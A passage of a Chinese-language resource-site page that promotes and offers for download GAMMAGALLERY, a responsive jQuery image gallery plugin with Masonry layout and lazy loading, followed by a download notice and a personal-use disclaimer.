...ery插件介绍 欢迎使用GAMMAGALLERY这款强大的jQuery插件，为您打造真正响应式的图片展示画廊。在数字时代，如何让网站上的图片既美观又易于访问，成为了一个挑战。而GAMMAGALLERY正是解决这一难题的理想工具。它不仅支持根据不同屏幕尺寸自动调整图片大小，还能够根据需要加载更多图片，确保用户无论是在桌面还是移动设备上都能获得最佳浏览体验。借助Masonry布局算法，GAMMAGALLERY能够智能排列图片，即使在图片尺寸各异的情况下，也能保持画廊的整洁与美观。这意味着您的访客将享受到流畅且视觉上令人愉悦的浏览过程，无需担心图片重叠或留白过多的问题。此外，GAMMAGALLERY采用懒加载技术，仅在图片即将进入视口时才进行加载，从而显著提升页面加载速度，减少带宽消耗，优化用户体验。无论是个人博客、作品集网站还是商业展示平台，GAMMAGALLERY都能轻松胜任，让您专注于内容创作，而无需担忧技术细节。安装并配置GAMMAGALLERY后，您只需上传图片，并设置一些基本参数，即可拥有一个功能强大、设计精美的图片画廊。不论是希望为网站增添一抹艺术气息，还是构建专业的作品集展示，GAMMAGALLERY都是您的不二之选。立即尝试，开启您的响应式图片画廊之旅吧！ 点我下载 文件大小：651.93 KB 您将下载一个JQuery插件资源包，该资源包内部文件的目录结构如下： 本网站提供JQuery插件下载功能，旨在帮助广大用户在工作学习中提升效率、节约时间。 本网站的下载内容来自于互联网。如您发现任何侵犯您权益的内容，请立即告知我们，我们将迅速响应并删除相关内容。 免责声明：站内所有资源仅供个人学习研究及参考之用，严禁将这些资源应用于商业场景。 若擅自商用导致的一切后果，由使用者承担责任。